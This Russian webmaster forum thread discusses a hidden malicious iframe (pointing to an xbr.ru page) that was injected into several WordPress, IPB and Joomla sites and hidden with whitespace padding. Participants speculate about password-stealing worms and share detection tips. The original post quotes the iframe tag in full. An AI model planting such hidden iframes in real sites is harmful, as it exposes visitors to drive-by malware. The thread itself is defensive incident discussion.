То ли взлом, то ли червь...

Zhilinsky
На сайте с 05.08.2007
Offline
86
678

<iframe src="http:[ // ]xbr.ru/images/old/index.php" width="1" height="1" style="visibility: hidden;"></iframe>

Вот такую хрень подсадили на несколько сайтов. Внедрено в код настолько грамотно, что у меня глубокие сомнения автоматической работы червя. В wordpress был найден файл, формирующий хидеры и найдена точка, в которой фрейм гарантировано окажется перед объявлением типа документа. Перед echo было поставлено куча пробелов, чтобы при пролистывании кода видно не было. Между echo и фреймом - тоже.

То же самое было проделано с IPB и Joomla, способы те же, но движки то разные совсем ! И на html-сайте видел... Сервера - разные. Либо перехват пароля сниффером (пароли недешифруемые), либо пароли утянуты из TotalCommander =)

Но вроде люди говорят, что червяк, отточеный ещё на валуехосте. Хотя ХЗ.

Короче, советую поискать в выдаваемом коде своих сайтов слово "xbr" - мало ли не один я поймал.

Жилинский (http://жилинский.рф/).
motoman
На сайте с 11.05.2006
Offline
333
#1

Zhilinsky, давно уже промышляют подобным....

Cмотреть истории инстаграм анонимно - https://anonstories.online/ru Обзорная статья об этом: https://www.pro-smm.com/istorii-v-instagram-anonimno/
Zhilinsky
На сайте с 05.08.2007
Offline
86
#2

В ЖЖ сказали, что всё-таки червь, тырит пароли где находит. Умнеют, гады...

MoMM
На сайте с 16.06.2006
Offline
727
#3
Zhilinsky:
Короче, советую поискать в выдаваемом коде своих сайтов слово "xbr" - мало ли не один я поймал.

этот троян перестраивается каждым "иннициатором" под свой сайт. потому лучше проверять на наличие "iframe"

motoman
На сайте с 11.05.2006
Offline
333
#4
Zhilinsky:
В ЖЖ сказали, что всё-таки червь, тырит пароли где находит. Умнеют, гады..

Есть тема что они их у хостинг компаний забирают... точнее забираются через дырку в хостинге.

Zhilinsky
На сайте с 05.08.2007
Offline
86
#5

Не, я раскапываю свой случай - скорее всего заражена сеть на работе - только оттуда можно было ко всем сайтам пароли выцепить. Да и хостинги совсем разные, в том числе один собственный, на котором всего два сайта висит.

Завтра буду там всё антивирями вдоль и поперёк прочёсывать - споймаю тварь =)

NOD ничего не нашёл, гадина...

W
На сайте с 21.06.2006
Offline
19
#6

Этот червь касперским хорошо ловиться.

LPS v1.1 - система оценки стоимости ссылки с сайта (http://www.openseo.ru/lps/) *новая версия PHP(ООП), MySQL: Cкрипты, Разработка CMS, Веб приложения, SEO сервисы.. (/ru/forum/160619) А Вы Яндекс? (http://www.openseo.ru)
Zhilinsky
На сайте с 05.08.2007
Offline
86
#7

Народ, чё скажу - офигеете. Знаете кто червяка принёс ? ООО "Продвижение", будь оно неладно, и они это подтвердили :-)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий